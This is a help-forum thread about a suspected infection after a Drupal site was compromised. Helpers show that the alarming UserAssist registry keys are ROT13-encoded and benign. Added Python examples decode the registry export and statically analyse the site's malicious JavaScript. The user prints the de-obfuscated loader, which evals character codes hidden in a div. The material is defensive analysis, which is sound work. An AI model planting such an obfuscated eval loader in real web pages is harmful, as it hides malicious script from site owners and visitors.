Virus affecting the UserAssist registry key, Internet Explorer and more

I got a virus from an infected Drupal website. I have Windows 8.1 in Administrator Mode.

The major sign of the virus is that if I open the website in question (which has now been disinfected) with Internet Explorer, I see a bunch of random characters and the source code includes some divs with obfuscated javascript.

I’ve run several anti-virus scans (Avast, AVG, Panda), HijackThis, CCleaner, Malwarebytes, and Security Task Manager.

The only major thing they found were some InetCookies that were malicious and deleted. Since then, I’ve repeatedly emptied the Internet Explorer cache, run multiple scans (in safe mode, in bootup, in regular mode) and whenever I return to opening the website in IE it gives me the malicious code.

Eventually I ran tests with (Sysinternals) Process Manager and was lucky to catch iexplore.exe writing some malicious registry keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist.

There are two standard keys: HRZR_PGYFRFFVBA and HRZR_PGYPHNPbhag:pgbe
(And if you do an internet search for them you will find other references to viruses).

And there are multiple random keys like
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4DDD-48FF-BB0B-D3190DACB3E2}\Count
P:\Hfref\Nqzvavfgengbe\NccQngn\Ybpny\Grzc\Cebpzba64.rkr

or
Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt

A smaller number of the keys are .yax files.

Now I can delete the keys, but when I reopen that website in IE, even if I am in Safe Mode (with Networking), they are created again.

I suspect a rootkit infection, but am unable to identify the cause.

I’ve spent a lot of time on this and would greatly appreciate any help.

I could post some logs - though I’m not sure if they are really useful.

My goal is to find the cause of this without having to reinstall Windows, as I want a solution that can be used by others who were infected that is easier than reinstalling.

The major sign of the virus is that if I open the website in question (which has now been disinfected) with Internet Explorer, I see a bunch of random characters and the source code includes some divs with obfuscated javascript.
That doesn't mean the site is infected. It can also be that things are badly programmed.
I've run several anti-virus scans (Avast, AVG, Panda), HijackThis, CCleaner, Malwarebytes, and Security Task Manager.
What did you want to check? Your system or the site?
The only major thing they found were some InetCookies that were malicious and deleted.
Cookies themselves are never malicious.

Follow the instructions and attach the logs to your next post:
https://forum.avast.com/index.php?topic=53253.0

It’s a Drupal website that I manage. I found five malicious scripts on it, deleted them, and installed the security upgrades.

I’m trying to find viruses on my home pc.

I did a search for “HRZR_” and found more bad registry keys:

HKEY_USERS\S-1-5-21-364787011-452331410-611592171-500\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

Now I’ll post some logs for Malwarebytes, Farbar, and aswmbr.

You are running Avast, AVG and Panda … two of them must go

Bitdefender is also installed.

http://blog.kaspersky.com/multiple-antivirus-programs-bad-idea/

Uninstalling a third-party antivirus software >> https://www.avast.com/faq.php?article=AVKB11#artTitle

Interesting, but not entirely convincing. I saw the fighting over viruses - not a big deal. The level of resources consumed by running multiple software was minimal (I’ve got a 4670K at 4.4 GHz with 16 GB RAM and SSD drives). My system has been totally stable. I’ve had problems with AVG protecting itself (and more critically I had to get the AVG removal tool because it managed to break itself at one point - but at that point it was just being a minor inconvenience taking up a bit of memory).

By contrast, by running multiple anti-virus products I have found things that my initial setup - Avast only - didn’t find.

That said, I’m willing to uninstall everything except Avast (or should I uninstall that as well?). I can also rerun the tests, though I’m guessing I won’t find anything.

Any comments about the damaging evidence that I’ve found in the registry?
Any comments about what the attachments that I submitted found (or really didn’t find)?

Did you decode the UserAssist keys? http://www.nirsoft.net/utils/userassist_view.html

So I tried the UserAssistView tool and have attached the results.

Are the random characters that I’m seeing actually encoded?

It says it gets the value from this key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

Does it properly handle sub-keys? My malicious content is under keys like this one:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

And it doesn’t look like UserAssistView is getting that - so I’m also attaching a registry export of the key.

I turned off all the anti-virus (except Avast) and re-ran the scans.

Could you resave userassist as ANSI please, as the forum software has changed it to Unicode.

Do you want the registry export from regedit or the UserAssistView one?

The UserAssist one, as the reg export is OK.

OK, I saved it in ANSI format.

8216C80C92C4E828 this one is related to HTML5

and the rest are all legitimate programmes

Removal though from the registry has done no harm… :slight_smile:

I can see no sign of malware on the system
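For readers who want to check the UserAssist listing themselves rather than trusting a tool, here is an added example (not from this thread or from the UserAssistView author) that decodes a regedit export of the key. The value names under UserAssist\{GUID}\Count are ROT13-obfuscated, so the "random" names quoted in this thread decode directly; on Windows 7 and later each value's data is a 72-byte record whose run count sits at offset 4 and whose last-run FILETIME sits at offset 60. The .reg text below is constructed for the example: the names are the ones quoted in the thread, the counts and timestamps are made up.

```python
import codecs
import re
import struct
from datetime import datetime, timedelta, timezone

# Constructed .reg export in the shape regedit produces for the
# UserAssist\{GUID}\Count key discussed in this thread. The value names are the
# ones quoted in the thread; the binary data (run counts, timestamps) is made up.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count]
"HRZR_PGYFRFFVBA"=hex:00,00,00,00,03,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,ff,ff,ff,ff
"P:\\Hfref\\Nqzvavfgengbe\\NccQngn\\Ybpny\\Grzc\\Cebpzba64.rkr"=hex:00,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,80,b9,e2,55,25,d0,01,ff,ff,ff,ff
"Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt"=hex:00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,e8,7d,44,5e,25,d0,01,ff,ff,ff,ff
'''

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def decode_name(name):
    """UserAssist value names are ROT13-obfuscated, not encrypted: only ASCII
    letters change, so drive letters' colons, backslashes, digits and GUIDs
    survive untouched and the decoded string is a readable path or class name."""
    return codecs.decode(name, "rot13")


def parse_record(data):
    """Windows 7/8.1 UserAssist data is a 72-byte record: the run count is the
    DWORD at offset 4, the last-run FILETIME the QWORD at offset 60. Any other
    length (e.g. the 16-byte XP layout) is reported without those fields."""
    if len(data) != 72:
        return {"run_count": None, "last_run": None}
    run_count = struct.unpack_from("<I", data, 4)[0]
    filetime = struct.unpack_from("<Q", data, 60)[0]
    last_run = None
    if filetime:  # zero means "never recorded", typical for the UEME_CTL* counters
        last_run = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {"run_count": run_count, "last_run": last_run}


def decode_reg_export(text):
    """Parse a regedit .reg export and return a dict keyed by the decoded value
    name, with the registry key, the raw ROT13 name, run count and last run."""
    # regedit wraps long hex values as ",\" + newline + two spaces; rejoin them.
    text = re.sub(r",\\\r?\n\s*", ",", text)
    result, current_key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=hex:(.*)$', line)
        if not m or "UserAssist" not in (current_key or ""):
            continue
        # .reg files escape backslashes and quotes inside value names.
        raw_name = m.group(1).replace('\\"', '"').replace("\\\\", "\\")
        data = bytes(int(h, 16) for h in m.group(2).split(",") if h.strip())
        entry = {"key": current_key, "raw_name": raw_name}
        entry.update(parse_record(data))
        result[decode_name(raw_name)] = entry
    return result


if __name__ == "__main__":
    for name, entry in decode_reg_export(SAMPLE_REG_EXPORT).items():
        when = entry["last_run"].isoformat() if entry["last_run"] else "-"
        print(f"{entry['run_count']!s:>4}  {when:25}  {name}")
```

Decoding the names quoted earlier in the thread gives UEME_CTLSESSION, UEME_CTLCUACount:ctor, C:\Users\Administrator\AppData\Local\Temp\Procmon64.exe and Microsoft.Windows.Shell.RunDialog: the counters Windows keeps for itself, the Process Monitor binary and the Run dialog, i.e. a record of what was launched from that account. Because Explorer rewrites these entries every time something is launched, deleting them and seeing them reappear is expected behaviour rather than evidence of persistence.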

I did some searching and it appears that Microsoft is intentionally using ROT13 encryption on these registry entries. So that confirms what you’re saying.

Weird place to use encryption though :slight_smile:

Do you think it is possible to catch the virus in the act by using Process Monitor?

I’ve been using Process Monitor and opening the one website that gives the malicious code in IE. It’s challenging though because Process Monitor generates thousands of events per second.

I’m probably going to reinstall Windows, but I’m concerned for everyone else who was infected - as I think most of them won’t reinstall. Either the virus is very good at hiding its malicious activity, or it failed to completely install itself.

Here is a copy of the malicious JS. Is there a way to decrypt it and figure out what it does?

I de-obfuscated the JS using http://ddecode.com/hexdecoder/ and some manual copying and pasting to build the variables:

var ahkslogfab="(\"bmatxzfmfky\").";
var nmdssprzmetsjz="constructor";
var hrvalbnjzjmupz=".apply(null,";
var tiesfnjmajfml="(";
var vfoznywclt="innerHTML";
var tbkiibqoquvujjs="document.getElementById";
var ghztbjrizug="String.fromCharCode";
var bfxogwyyetrlupe=")";
var uedwjfoqfafn="eval";
var wfzaposdkyxmku=".split(\",\"))";

[nmdssprzmetsjz][nmdssprzmetsjz](uedwjfoqfafn + tiesfnjmajfml + ghztbjrizug + hrvalbnjzjmupz + tbkiibqoquvujjs + ahkslogfab + vfoznywclt + wfzaposdkyxmku + bfxogwyyetrlupe)();

The result is this:
[constructor][constructor](eval(String.fromCharCode.apply(null,document.getElementById("bmatxzfmfky").innerHTML.split(","))))();

So it is getting the Unicode characters from the DIV and then executing eval on them.
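The question asked earlier, whether the script can be decoded to see what it does, can be answered without ever running it. The following is an added example (not code from this thread, and not from any tool mentioned in it) that resolves the string concatenation by lookup, reports which element the loader reads, and turns the comma-separated character codes from that element back into text the way String.fromCharCode would. The loader text is the de-obfuscated version posted above with straight quotes; the inner quotes in ahkslogfab and wfzaposdkyxmku are assumed to have been backslash-escaped in the original script. The div content is a constructed stand-in that decodes to a harmless console.log call; on a real infected page this is where the second stage would sit, and the decoder prints it instead of executing it.

```python
import re

# The de-obfuscated loader as reconstructed in this thread (quotes restored to
# straight ASCII quotes; the inner quotes are assumed to have been escaped).
LOADER_JS = r'''
var ahkslogfab="(\"bmatxzfmfky\").";
var nmdssprzmetsjz="constructor";
var hrvalbnjzjmupz=".apply(null,";
var tiesfnjmajfml="(";
var vfoznywclt="innerHTML";
var tbkiibqoquvujjs="document.getElementById";
var ghztbjrizug="String.fromCharCode";
var bfxogwyyetrlupe=")";
var uedwjfoqfafn="eval";
var wfzaposdkyxmku=".split(\",\"))";
[nmdssprzmetsjz][nmdssprzmetsjz](uedwjfoqfafn + tiesfnjmajfml + ghztbjrizug + hrvalbnjzjmupz + tbkiibqoquvujjs + ahkslogfab + vfoznywclt + wfzaposdkyxmku + bfxogwyyetrlupe)();
'''

# Constructed stand-in for the hidden <div>'s innerHTML: comma-separated
# character codes. This sample decodes to console.log("hi").
SAMPLE_DIV_TEXT = "99,111,110,115,111,108,101,46,108,111,103,40,34,104,105,34,41"

# `var name="literal";` with backslash escapes allowed inside the literal.
STRING_VAR = re.compile(r'var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# `[x][x](expr)();` : the array-literal route to the Function constructor.
CTOR_CALL = re.compile(r"\[(\w+)\]\[\1\]\((.+?)\)\(\);", re.S)


def parse_string_vars(js):
    """Collect every string variable assignment, unescaping \" inside it."""
    return {name: value.replace('\\"', '"') for name, value in STRING_VAR.findall(js)}


def resolve_concat(expr, variables):
    """Evaluate `a + b + "lit"` purely by lookup and joining. Operands that
    are neither known variables nor plain literals are refused rather than
    guessed, so nothing attacker-controlled is ever executed here."""
    out = []
    for tok in expr.split("+"):
        tok = tok.strip()
        if tok in variables:
            out.append(variables[tok])
        elif len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
            out.append(tok[1:-1])
        else:
            raise ValueError(f"unsupported operand: {tok!r}")
    return "".join(out)


def decode_charcodes(text):
    """What String.fromCharCode.apply(null, text.split(",")) would produce."""
    return "".join(chr(int(c)) for c in text.split(",") if c.strip())


def analyse_loader(js, div_text):
    """Static analysis of the loader: stage 1 is the string handed to the
    Function constructor, stage 2 the payload it would read from the div."""
    variables = parse_string_vars(js)
    m = CTOR_CALL.search(js)
    if not m:
        raise ValueError("no [x][x](...)() call found")
    stage1 = resolve_concat(m.group(2), variables)
    id_match = re.search(r'getElementById\("([^"]+)"\)', stage1)
    return {
        # [ "constructor" ]["constructor"] reaches Function via an array literal
        "uses_function_constructor": variables.get(m.group(1)) == "constructor",
        "stage1": stage1,
        "element_id": id_match.group(1) if id_match else None,
        "stage2": decode_charcodes(div_text),
    }


if __name__ == "__main__":
    info = analyse_loader(LOADER_JS, SAMPLE_DIV_TEXT)
    for key, value in info.items():
        print(f"{key}: {value}")
```

Stage 1 resolves to eval(String.fromCharCode.apply(null,document.getElementById("bmatxzfmfky").innerHTML.split(","))), which names the element to look for in the saved HTML: the div with id bmatxzfmfky. Feeding that div's text to decode_charcodes gives the script that would actually run in the browser, and searching a site's files for the same id or for the [x][x](...)() pattern is a reasonable way to find other pages carrying the same loader.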